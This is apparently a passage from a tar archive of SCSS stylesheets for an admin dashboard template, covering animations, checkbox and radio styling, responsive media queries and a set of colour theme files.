transform: rotate(-130deg);
}
}
@keyframes right-spin {
from {
-moz-transform: rotate(-130deg);
-ms-transform: rotate(-130deg);
-o-transform: rotate(-130deg);
-webkit-transform: rotate(-130deg);
transform: rotate(-130deg);
}
50% {
-moz-transform: rotate(5deg);
-ms-transform: rotate(5deg);
-o-transform: rotate(5deg);
-webkit-transform: rotate(5deg);
transform: rotate(5deg);
}
to {
-moz-transform: rotate(-130deg);
-ms-transform: rotate(-130deg);
-o-transform: rotate(-130deg);
-webkit-transform: rotate(-130deg);
transform: rotate(-130deg);
}
}
_jquerynestable.scss 0000644 00000000532 15076416166 0010651 0 ustar 00 .dd-handle {
background-color: #f9f9f9 !important;
&:hover {
color: #2196F3;
}
}
.nestable-dark-theme {
.dd-handle {
background: #ccc !important;
border: 1px solid #999 !important;
}
}
.dd3-handle {
background: #999 !important;
}
.dd3-content {
&:hover {
color: #2196F3;
}
}
_general.scss 0000644 00000001672 15076416166 0007237 0 ustar 00 body {
background-color: #e9e9e9;
@include transition(all .5s);
font-family: 'Roboto', Arial, Tahoma, sans-serif;
}
h1,
h2,
h3,
h4,
h5,
h6 {
font-weight: bold;
}
button,
input,
select,
a {
outline: none !important;
}
.no-animate {
-o-transition-property: none !important;
-moz-transition-property: none !important;
-ms-transition-property: none !important;
-webkit-transition-property: none !important;
transition-property: none !important;
-o-transform: none !important;
-moz-transform: none !important;
-ms-transform: none !important;
-webkit-transform: none !important;
transform: none !important;
-webkit-animation: none !important;
-moz-animation: none !important;
-o-animation: none !important;
-ms-animation: none !important;
animation: none !important;
}
section {
&.content {
margin: 100px 15px 0 315px;
@include transition(.5s);
}
}
_checkboxradio.scss 0000644 00000004620 15076416166 0010423 0 ustar 00 [type="checkbox"] {
+ label {
padding-left: 26px;
height: 25px;
line-height: 21px;
font-size: 13px;
font-weight: normal;
}
&:checked {
+ label {
&:before {
top: -4px;
left: -2px;
width: 11px;
height: 19px;
}
}
}
@each $key, $val in $colors {
&:checked.chk-col-#{$key} {
+ label {
&:before {
border-right: 2px solid $val;
border-bottom: 2px solid $val;
}
}
}
}
}
[type="checkbox"].filled-in {
&:checked {
+ label {
&:after {
top: 0;
width: 20px;
height: 20px;
border: 2px solid #26a69a;
background-color: #26a69a;
z-index: 0;
}
&:before {
border-right: 2px solid #fff !important;
border-bottom: 2px solid #fff !important;
}
}
}
@each $key, $val in $colors {
&:checked.chk-col-#{$key} {
+ label {
&:after {
border: 2px solid $val;
background-color: $val;
}
}
}
}
}
[type="radio"] {
&:not(:checked) {
+ label {
padding-left: 26px;
height: 25px;
line-height: 25px;
font-size: 13px;
font-weight: normal;
}
}
&:checked {
+ label {
padding-left: 26px;
height: 25px;
line-height: 25px;
font-size: 13px;
font-weight: normal;
}
}
}
@each $key, $val in $colors {
[type="radio"].radio-col-#{$key} {
&:checked {
+ label {
&:after {
background-color: $val;
border-color: $val;
}
}
}
}
}
@each $key, $val in $colors {
[type="radio"].with-gap.radio-col-#{$key} {
&:checked {
+ label {
&:before {
border: 2px solid $val;
}
&:after {
background-color: $val;
border: 2px solid $val;
}
}
}
}
}
_media.scss 0000644 00000003077 15076416166 0006702 0 ustar 00 @media (max-width: 767px) {
.navbar {
> .container,
> .container-fluid {
.navbar-brand {
margin-left: 35px;
width: 73%;
}
}
.navbar-header {
display: inline-block;
margin-bottom: -6px;
width: calc(100% + 30px);
}
.nav {
> li {
display: inline-block;
}
}
.navbar-nav {
margin-top: -10px;
margin-bottom: 1px;
margin-left: -7px;
.open {
.dropdown-menu {
background-color: #fff;
position: absolute;
}
}
}
.dropdown-menu {
margin-left: -50px;
}
.js-right-sidebar {
margin-top: 15px;
}
}
.dt-buttons {
float: none !important;
text-align: center;
margin-bottom: 15px;
}
.panel-switch-btn {
top: 12px;
right: 0 !important;
}
}
@media (min-width: 768px) and (max-width: 991px) {
.navbar {
> .container,
> .container-fluid {
.navbar-brand {
margin-left: 20px;
}
}
}
}
@media (min-width: 992px) and (max-width: 1169px) {
.navbar {
> .container,
> .container-fluid {
.navbar-brand {
margin-left: 20px;
}
}
}
}
@media (min-width: 1170px) and (max-width: 1999px) {
}
@media (min-width: 1200px) {
}
themes/_theme-color-variables.scss 0000644 00000032356 15076416166 0013276 0 ustar 00 //Theme Red
$theme-red: #F44336;
$theme-red-legal-bg: #fff;
$theme-red-bar: #fff;
$theme-red-navbar-brand: #fff;
$theme-red-navbar-brand_active: #fff;
$theme-red-navbar-brand_hover: #fff;
$theme-red-navbar-brand_focus: #fff;
$theme-red-nav-anchor: #fff;
$theme-red-nav-anchor_hover: rgba(0,0,0,0);
$theme-red-nav-anchor_focus: rgba(0,0,0,0);
$theme-red-nav-anchor-opened: rgba(0,0,0,0);
$theme-red-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-red-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-red-menu-list-active: rgba(0,0,0,0);
$theme-red-menu-list-toggled: rgba(0,0,0,0);
$theme-red-menu-list-submenu: rgba(0,0,0,0);
//Theme Pink
$theme-pink: #E91E63;
$theme-pink-legal-bg: #fff;
$theme-pink-bar: #fff;
$theme-pink-navbar-brand: #fff;
$theme-pink-navbar-brand_active: #fff;
$theme-pink-navbar-brand_hover: #fff;
$theme-pink-navbar-brand_focus: #fff;
$theme-pink-nav-anchor: #fff;
$theme-pink-nav-anchor_hover: rgba(0,0,0,0);
$theme-pink-nav-anchor_focus: rgba(0,0,0,0);
$theme-pink-nav-anchor-opened: rgba(0,0,0,0);
$theme-pink-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-pink-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-pink-menu-list-active: rgba(0,0,0,0);
$theme-pink-menu-list-toggled: rgba(0,0,0,0);
$theme-pink-menu-list-submenu: rgba(0,0,0,0);
//Theme Purple
$theme-purple: #9C27B0;
$theme-purple-legal-bg: #fff;
$theme-purple-bar: #fff;
$theme-purple-navbar-brand: #fff;
$theme-purple-navbar-brand_active: #fff;
$theme-purple-navbar-brand_hover: #fff;
$theme-purple-navbar-brand_focus: #fff;
$theme-purple-nav-anchor: #fff;
$theme-purple-nav-anchor_hover: rgba(0,0,0,0);
$theme-purple-nav-anchor_focus: rgba(0,0,0,0);
$theme-purple-nav-anchor-opened: rgba(0,0,0,0);
$theme-purple-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-purple-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-purple-menu-list-active: rgba(0,0,0,0);
$theme-purple-menu-list-toggled: rgba(0,0,0,0);
$theme-purple-menu-list-submenu: rgba(0,0,0,0);
//Theme Deep Purple
$theme-deep-purple: #673AB7;
$theme-deep-purple-legal-bg: #fff;
$theme-deep-purple-bar: #fff;
$theme-deep-purple-navbar-brand: #fff;
$theme-deep-purple-navbar-brand_active: #fff;
$theme-deep-purple-navbar-brand_hover: #fff;
$theme-deep-purple-navbar-brand_focus: #fff;
$theme-deep-purple-nav-anchor: #fff;
$theme-deep-purple-nav-anchor_hover: rgba(0,0,0,0);
$theme-deep-purple-nav-anchor_focus: rgba(0,0,0,0);
$theme-deep-purple-nav-anchor-opened: rgba(0,0,0,0);
$theme-deep-purple-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-deep-purple-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-deep-purple-menu-list-active: rgba(0,0,0,0);
$theme-deep-purple-menu-list-toggled: rgba(0,0,0,0);
$theme-deep-purple-menu-list-submenu: rgba(0,0,0,0);
//Theme Indigo
$theme-indigo: #3F51B5;
$theme-indigo-legal-bg: #fff;
$theme-indigo-bar: #fff;
$theme-indigo-navbar-brand: #fff;
$theme-indigo-navbar-brand_active: #fff;
$theme-indigo-navbar-brand_hover: #fff;
$theme-indigo-navbar-brand_focus: #fff;
$theme-indigo-nav-anchor: #fff;
$theme-indigo-nav-anchor_hover: rgba(0,0,0,0);
$theme-indigo-nav-anchor_focus: rgba(0,0,0,0);
$theme-indigo-nav-anchor-opened: rgba(0,0,0,0);
$theme-indigo-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-indigo-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-indigo-menu-list-active: rgba(0,0,0,0);
$theme-indigo-menu-list-toggled: rgba(0,0,0,0);
$theme-indigo-menu-list-submenu: rgba(0,0,0,0);
//Theme Blue
$theme-blue: #2196F3;
$theme-blue-legal-bg: #fff;
$theme-blue-bar: #fff;
$theme-blue-navbar-brand: #fff;
$theme-blue-navbar-brand_active: #fff;
$theme-blue-navbar-brand_hover: #fff;
$theme-blue-navbar-brand_focus: #fff;
$theme-blue-nav-anchor: #fff;
$theme-blue-nav-anchor_hover: rgba(0,0,0,0);
$theme-blue-nav-anchor_focus: rgba(0,0,0,0);
$theme-blue-nav-anchor-opened: rgba(0,0,0,0);
$theme-blue-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-blue-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-blue-menu-list-active: rgba(0,0,0,0);
$theme-blue-menu-list-toggled: rgba(0,0,0,0);
$theme-blue-menu-list-submenu: rgba(0,0,0,0);
//Theme Light Blue
$theme-light-blue: #03A9F4;
$theme-light-blue-legal-bg: #fff;
$theme-light-blue-bar: #fff;
$theme-light-blue-navbar-brand: #fff;
$theme-light-blue-navbar-brand_active: #fff;
$theme-light-blue-navbar-brand_hover: #fff;
$theme-light-blue-navbar-brand_focus: #fff;
$theme-light-blue-nav-anchor: #fff;
$theme-light-blue-nav-anchor_hover: rgba(0,0,0,0);
$theme-light-blue-nav-anchor_focus: rgba(0,0,0,0);
$theme-light-blue-nav-anchor-opened: rgba(0,0,0,0);
$theme-light-blue-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-light-blue-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-light-blue-menu-list-active: rgba(0,0,0,0);
$theme-light-blue-menu-list-toggled: rgba(0,0,0,0);
$theme-light-blue-menu-list-submenu: rgba(0,0,0,0);
//Theme Cyan
$theme-cyan: #00BCD4;
$theme-cyan-legal-bg: #fff;
$theme-cyan-bar: #fff;
$theme-cyan-navbar-brand: #fff;
$theme-cyan-navbar-brand_active: #fff;
$theme-cyan-navbar-brand_hover: #fff;
$theme-cyan-navbar-brand_focus: #fff;
$theme-cyan-nav-anchor: #fff;
$theme-cyan-nav-anchor_hover: rgba(0,0,0,0);
$theme-cyan-nav-anchor_focus: rgba(0,0,0,0);
$theme-cyan-nav-anchor-opened: rgba(0,0,0,0);
$theme-cyan-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-cyan-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-cyan-menu-list-active: rgba(0,0,0,0);
$theme-cyan-menu-list-toggled: rgba(0,0,0,0);
$theme-cyan-menu-list-submenu: rgba(0,0,0,0);
//Theme Teal
$theme-teal: #009688;
$theme-teal-legal-bg: #fff;
$theme-teal-bar: #fff;
$theme-teal-navbar-brand: #fff;
$theme-teal-navbar-brand_active: #fff;
$theme-teal-navbar-brand_hover: #fff;
$theme-teal-navbar-brand_focus: #fff;
$theme-teal-nav-anchor: #fff;
$theme-teal-nav-anchor_hover: rgba(0,0,0,0);
$theme-teal-nav-anchor_focus: rgba(0,0,0,0);
$theme-teal-nav-anchor-opened: rgba(0,0,0,0);
$theme-teal-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-teal-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-teal-menu-list-active: rgba(0,0,0,0);
$theme-teal-menu-list-toggled: rgba(0,0,0,0);
$theme-teal-menu-list-submenu: rgba(0,0,0,0);
//Theme Green
$theme-green: #4CAF50;
$theme-green-legal-bg: #fff;
$theme-green-bar: #fff;
$theme-green-navbar-brand: #fff;
$theme-green-navbar-brand_active: #fff;
$theme-green-navbar-brand_hover: #fff;
$theme-green-navbar-brand_focus: #fff;
$theme-green-nav-anchor: #fff;
$theme-green-nav-anchor_hover: rgba(0,0,0,0);
$theme-green-nav-anchor_focus: rgba(0,0,0,0);
$theme-green-nav-anchor-opened: rgba(0,0,0,0);
$theme-green-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-green-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-green-menu-list-active: rgba(0,0,0,0);
$theme-green-menu-list-toggled: rgba(0,0,0,0);
$theme-green-menu-list-submenu: rgba(0,0,0,0);
//Theme Light Green
$theme-light-green: #8BC34A;
$theme-light-green-legal-bg: #fff;
$theme-light-green-bar: #fff;
$theme-light-green-navbar-brand: #fff;
$theme-light-green-navbar-brand_active: #fff;
$theme-light-green-navbar-brand_hover: #fff;
$theme-light-green-navbar-brand_focus: #fff;
$theme-light-green-nav-anchor: #fff;
$theme-light-green-nav-anchor_hover: rgba(0,0,0,0);
$theme-light-green-nav-anchor_focus: rgba(0,0,0,0);
$theme-light-green-nav-anchor-opened: rgba(0,0,0,0);
$theme-light-green-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-light-green-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-light-green-menu-list-active: rgba(0,0,0,0);
$theme-light-green-menu-list-toggled: rgba(0,0,0,0);
$theme-light-green-menu-list-submenu: rgba(0,0,0,0);
//Theme Lime
$theme-lime: #CDDC39;
$theme-lime-legal-bg: #fff;
$theme-lime-bar: #fff;
$theme-lime-navbar-brand: #fff;
$theme-lime-navbar-brand_active: #fff;
$theme-lime-navbar-brand_hover: #fff;
$theme-lime-navbar-brand_focus: #fff;
$theme-lime-nav-anchor: #fff;
$theme-lime-nav-anchor_hover: rgba(0,0,0,0);
$theme-lime-nav-anchor_focus: rgba(0,0,0,0);
$theme-lime-nav-anchor-opened: rgba(0,0,0,0);
$theme-lime-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-lime-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-lime-menu-list-active: rgba(0,0,0,0);
$theme-lime-menu-list-toggled: rgba(0,0,0,0);
$theme-lime-menu-list-submenu: rgba(0,0,0,0);
//Theme Yellow
$theme-yellow: #FFEB3B;
$theme-yellow-legal-bg: #fff;
$theme-yellow-bar: #fff;
$theme-yellow-navbar-brand: #fff;
$theme-yellow-navbar-brand_active: #fff;
$theme-yellow-navbar-brand_hover: #fff;
$theme-yellow-navbar-brand_focus: #fff;
$theme-yellow-nav-anchor: #fff;
$theme-yellow-nav-anchor_hover: rgba(0,0,0,0);
$theme-yellow-nav-anchor_focus: rgba(0,0,0,0);
$theme-yellow-nav-anchor-opened: rgba(0,0,0,0);
$theme-yellow-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-yellow-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-yellow-menu-list-active: rgba(0,0,0,0);
$theme-yellow-menu-list-toggled: rgba(0,0,0,0);
$theme-yellow-menu-list-submenu: rgba(0,0,0,0);
//Theme Amber
$theme-amber: #FFC107;
$theme-amber-legal-bg: #fff;
$theme-amber-bar: #fff;
$theme-amber-navbar-brand: #fff;
$theme-amber-navbar-brand_active: #fff;
$theme-amber-navbar-brand_hover: #fff;
$theme-amber-navbar-brand_focus: #fff;
$theme-amber-nav-anchor: #fff;
$theme-amber-nav-anchor_hover: rgba(0,0,0,0);
$theme-amber-nav-anchor_focus: rgba(0,0,0,0);
$theme-amber-nav-anchor-opened: rgba(0,0,0,0);
$theme-amber-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-amber-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-amber-menu-list-active: rgba(0,0,0,0);
$theme-amber-menu-list-toggled: rgba(0,0,0,0);
$theme-amber-menu-list-submenu: rgba(0,0,0,0);
//Theme Orange
$theme-orange: #FF9800;
$theme-orange-legal-bg: #fff;
$theme-orange-bar: #fff;
$theme-orange-navbar-brand: #fff;
$theme-orange-navbar-brand_active: #fff;
$theme-orange-navbar-brand_hover: #fff;
$theme-orange-navbar-brand_focus: #fff;
$theme-orange-nav-anchor: #fff;
$theme-orange-nav-anchor_hover: rgba(0,0,0,0);
$theme-orange-nav-anchor_focus: rgba(0,0,0,0);
$theme-orange-nav-anchor-opened: rgba(0,0,0,0);
$theme-orange-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-orange-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-orange-menu-list-active: rgba(0,0,0,0);
$theme-orange-menu-list-toggled: rgba(0,0,0,0);
$theme-orange-menu-list-submenu: rgba(0,0,0,0);
//Theme Deep Orange
$theme-deep-orange: #FF5722;
$theme-deep-orange-legal-bg: #fff;
$theme-deep-orange-bar: #fff;
$theme-deep-orange-navbar-brand: #fff;
$theme-deep-orange-navbar-brand_active: #fff;
$theme-deep-orange-navbar-brand_hover: #fff;
$theme-deep-orange-navbar-brand_focus: #fff;
$theme-deep-orange-nav-anchor: #fff;
$theme-deep-orange-nav-anchor_hover: rgba(0,0,0,0);
$theme-deep-orange-nav-anchor_focus: rgba(0,0,0,0);
$theme-deep-orange-nav-anchor-opened: rgba(0,0,0,0);
$theme-deep-orange-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-deep-orange-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-deep-orange-menu-list-active: rgba(0,0,0,0);
$theme-deep-orange-menu-list-toggled: rgba(0,0,0,0);
$theme-deep-orange-menu-list-submenu: rgba(0,0,0,0);
//Theme Brown
$theme-brown: #795548;
$theme-brown-legal-bg: #fff;
$theme-brown-bar: #fff;
$theme-brown-navbar-brand: #fff;
$theme-brown-navbar-brand_active: #fff;
$theme-brown-navbar-brand_hover: #fff;
$theme-brown-navbar-brand_focus: #fff;
$theme-brown-nav-anchor: #fff;
$theme-brown-nav-anchor_hover: rgba(0,0,0,0);
$theme-brown-nav-anchor_focus: rgba(0,0,0,0);
$theme-brown-nav-anchor-opened: rgba(0,0,0,0);
$theme-brown-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-brown-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-brown-menu-list-active: rgba(0,0,0,0);
$theme-brown-menu-list-toggled: rgba(0,0,0,0);
$theme-brown-menu-list-submenu: rgba(0,0,0,0);
//Theme Grey
$theme-grey: #9E9E9E;
$theme-grey-legal-bg: #fff;
$theme-grey-bar: #fff;
$theme-grey-navbar-brand: #fff;
$theme-grey-navbar-brand_active: #fff;
$theme-grey-navbar-brand_hover: #fff;
$theme-grey-navbar-brand_focus: #fff;
$theme-grey-nav-anchor: #fff;
$theme-grey-nav-anchor_hover: rgba(0,0,0,0);
$theme-grey-nav-anchor_focus: rgba(0,0,0,0);
$theme-grey-nav-anchor-opened: rgba(0,0,0,0);
$theme-grey-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-grey-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-grey-menu-list-active: rgba(0,0,0,0);
$theme-grey-menu-list-toggled: rgba(0,0,0,0);
$theme-grey-menu-list-submenu: rgba(0,0,0,0);
//Theme Blue Grey
$theme-blue-grey: #607D8B;
$theme-blue-grey-legal-bg: #fff;
$theme-blue-grey-bar: #fff;
$theme-blue-grey-navbar-brand: #fff;
$theme-blue-grey-navbar-brand_active: #fff;
$theme-blue-grey-navbar-brand_hover: #fff;
$theme-blue-grey-navbar-brand_focus: #fff;
$theme-blue-grey-nav-anchor: #fff;
$theme-blue-grey-nav-anchor_hover: rgba(0,0,0,0);
$theme-blue-grey-nav-anchor_focus: rgba(0,0,0,0);
$theme-blue-grey-nav-anchor-opened: rgba(0,0,0,0);
$theme-blue-grey-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-blue-grey-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-blue-grey-menu-list-active: rgba(0,0,0,0);
$theme-blue-grey-menu-list-toggled: rgba(0,0,0,0);
$theme-blue-grey-menu-list-submenu: rgba(0,0,0,0);
//Theme Black
$theme-black: #000;
$theme-black-legal-bg: #fff;
$theme-black-bar: #fff;
$theme-black-navbar-brand: #fff;
$theme-black-navbar-brand_active: #fff;
$theme-black-navbar-brand_hover: #fff;
$theme-black-navbar-brand_focus: #fff;
$theme-black-nav-anchor: #fff;
$theme-black-nav-anchor_hover: rgba(0,0,0,0);
$theme-black-nav-anchor_focus: rgba(0,0,0,0);
$theme-black-nav-anchor-opened: rgba(0,0,0,0);
$theme-black-nav-anchor-opened_hover: rgba(0,0,0,0);
$theme-black-nav-anchor-opened_focus: rgba(0,0,0,0);
$theme-black-menu-list-active: rgba(0,0,0,0);
$theme-black-menu-list-toggled: rgba(0,0,0,0);
$theme-black-menu-list-submenu: rgba(0,0,0,0);
themes/theme-teal.scss 0000644 00000003706 15076416166 0010775 0 ustar 00 @import '_theme-color-variables';
.theme-teal {
.navbar {
background-color: $theme-teal;
}
.navbar-brand {
color: $theme-teal-navbar-brand;
&:hover {
color: $theme-teal-navbar-brand_hover;
}
&:active {
color: $theme-teal-navbar-brand_active;
}
&:focus {
color: $theme-teal-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-teal-nav-anchor;
&:hover {
background-color: $theme-teal-nav-anchor_hover;
}
&:focus {
background-color: $theme-teal-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-teal-nav-anchor-opened;
&:hover {
background-color: $theme-teal-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-teal-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-teal-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-teal-menu-list-active;
> :first-child {
i, span {
color: $theme-teal;
}
}
}
.toggled {
background-color: $theme-teal-menu-list-toggled;
}
.ml-menu {
background-color: $theme-teal-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-teal-legal-bg;
.copyright {
a {
color: $theme-teal !important;
}
}
}
}
}
themes/theme-blue-grey.scss 0000644 00000004045 15076416166 0011740 0 ustar 00 @import '_theme-color-variables';
.theme-blue-grey {
.navbar {
background-color: $theme-blue-grey;
}
.navbar-brand {
color: $theme-blue-grey-navbar-brand;
&:hover {
color: $theme-blue-grey-navbar-brand_hover;
}
&:active {
color: $theme-blue-grey-navbar-brand_active;
}
&:focus {
color: $theme-blue-grey-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-blue-grey-nav-anchor;
&:hover {
background-color: $theme-blue-grey-nav-anchor_hover;
}
&:focus {
background-color: $theme-blue-grey-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-blue-grey-nav-anchor-opened;
&:hover {
background-color: $theme-blue-grey-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-blue-grey-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-blue-grey-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-blue-grey-menu-list-active;
> :first-child {
i, span {
color: $theme-blue-grey;
}
}
}
.toggled {
background-color: $theme-blue-grey-menu-list-toggled;
}
.ml-menu {
background-color: $theme-blue-grey-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-blue-grey-legal-bg;
.copyright {
a {
color: $theme-blue-grey !important;
}
}
}
}
}
themes/theme-indigo.scss 0000644 00000003754 15076416166 0011324 0 ustar 00 @import '_theme-color-variables';
.theme-indigo {
.navbar {
background-color: $theme-indigo;
}
.navbar-brand {
color: $theme-indigo-navbar-brand;
&:hover {
color: $theme-indigo-navbar-brand_hover;
}
&:active {
color: $theme-indigo-navbar-brand_active;
}
&:focus {
color: $theme-indigo-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-indigo-nav-anchor;
&:hover {
background-color: $theme-indigo-nav-anchor_hover;
}
&:focus {
background-color: $theme-indigo-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-indigo-nav-anchor-opened;
&:hover {
background-color: $theme-indigo-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-indigo-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-indigo-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-indigo-menu-list-active;
> :first-child {
i, span {
color: $theme-indigo;
}
}
}
.toggled {
background-color: $theme-indigo-menu-list-toggled;
}
.ml-menu {
background-color: $theme-indigo-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-indigo-legal-bg;
.copyright {
a {
color: $theme-indigo !important;
}
}
}
}
}
themes/theme-cyan.scss 0000644 00000003706 15076416166 0011002 0 ustar 00 @import '_theme-color-variables';
.theme-cyan {
.navbar {
background-color: $theme-cyan;
}
.navbar-brand {
color: $theme-cyan-navbar-brand;
&:hover {
color: $theme-cyan-navbar-brand_hover;
}
&:active {
color: $theme-cyan-navbar-brand_active;
}
&:focus {
color: $theme-cyan-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-cyan-nav-anchor;
&:hover {
background-color: $theme-cyan-nav-anchor_hover;
}
&:focus {
background-color: $theme-cyan-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-cyan-nav-anchor-opened;
&:hover {
background-color: $theme-cyan-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-cyan-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-cyan-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-cyan-menu-list-active;
> :first-child {
i, span {
color: $theme-cyan;
}
}
}
.toggled {
background-color: $theme-cyan-menu-list-toggled;
}
.ml-menu {
background-color: $theme-cyan-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-cyan-legal-bg;
.copyright {
a {
color: $theme-cyan !important;
}
}
}
}
}
themes/_all-themes.scss 0000644 00000000756 15076416166 0011144 0 ustar 00 //Themes
@import 'theme-red';
@import 'theme-pink';
@import 'theme-purple';
@import 'theme-deep-purple';
@import 'theme-indigo';
@import 'theme-blue';
@import 'theme-light-blue';
@import 'theme-cyan';
@import 'theme-teal';
@import 'theme-green';
@import 'theme-light-green';
@import 'theme-lime';
@import 'theme-yellow';
@import 'theme-amber';
@import 'theme-orange';
@import 'theme-deep-orange';
@import 'theme-brown';
@import 'theme-grey';
@import 'theme-blue-grey';
@import 'theme-black'; themes/theme-blue.scss 0000644 00000003706 15076416166 0010777 0 ustar 00 @import '_theme-color-variables';
.theme-blue {
.navbar {
background-color: $theme-blue;
}
.navbar-brand {
color: $theme-blue-navbar-brand;
&:hover {
color: $theme-blue-navbar-brand_hover;
}
&:active {
color: $theme-blue-navbar-brand_active;
}
&:focus {
color: $theme-blue-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-blue-nav-anchor;
&:hover {
background-color: $theme-blue-nav-anchor_hover;
}
&:focus {
background-color: $theme-blue-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-blue-nav-anchor-opened;
&:hover {
background-color: $theme-blue-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-blue-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-blue-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-blue-menu-list-active;
> :first-child {
i, span {
color: $theme-blue;
}
}
}
.toggled {
background-color: $theme-blue-menu-list-toggled;
}
.ml-menu {
background-color: $theme-blue-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-blue-legal-bg;
.copyright {
a {
color: $theme-blue !important;
}
}
}
}
}
themes/theme-pink.scss 0000644 00000003706 15076416166 0011011 0 ustar 00 @import '_theme-color-variables';
.theme-pink {
.navbar {
background-color: $theme-pink;
}
.navbar-brand {
color: $theme-pink-navbar-brand;
&:hover {
color: $theme-pink-navbar-brand_hover;
}
&:active {
color: $theme-pink-navbar-brand_active;
}
&:focus {
color: $theme-pink-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-pink-nav-anchor;
&:hover {
background-color: $theme-pink-nav-anchor_hover;
}
&:focus {
background-color: $theme-pink-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-pink-nav-anchor-opened;
&:hover {
background-color: $theme-pink-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-pink-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-pink-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-pink-menu-list-active;
> :first-child {
i, span {
color: $theme-pink;
}
}
}
.toggled {
background-color: $theme-pink-menu-list-toggled;
}
.ml-menu {
background-color: $theme-pink-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-pink-legal-bg;
.copyright {
a {
color: $theme-pink !important;
}
}
}
}
}
themes/theme-black.scss 0000644 00000003731 15076416166 0011122 0 ustar 00 @import '_theme-color-variables';
.theme-black {
.navbar {
background-color: $theme-black;
}
.navbar-brand {
color: $theme-black-navbar-brand;
&:hover {
color: $theme-black-navbar-brand_hover;
}
&:active {
color: $theme-black-navbar-brand_active;
}
&:focus {
color: $theme-black-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-black-nav-anchor;
&:hover {
background-color: $theme-black-nav-anchor_hover;
}
&:focus {
background-color: $theme-black-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-black-nav-anchor-opened;
&:hover {
background-color: $theme-black-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-black-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-black-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-black-menu-list-active;
> :first-child {
i, span {
color: $theme-black;
}
}
}
.toggled {
background-color: $theme-black-menu-list-toggled;
}
.ml-menu {
background-color: $theme-black-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-black-legal-bg;
.copyright {
a {
color: $theme-black !important;
}
}
}
}
}
themes/theme-deep-orange.scss 0000644 00000004113 15076416166 0012227 0 ustar 00 @import '_theme-color-variables';
.theme-deep-orange {
.navbar {
background-color: $theme-deep-orange;
}
.navbar-brand {
color: $theme-deep-orange-navbar-brand;
&:hover {
color: $theme-deep-orange-navbar-brand_hover;
}
&:active {
color: $theme-deep-orange-navbar-brand_active;
}
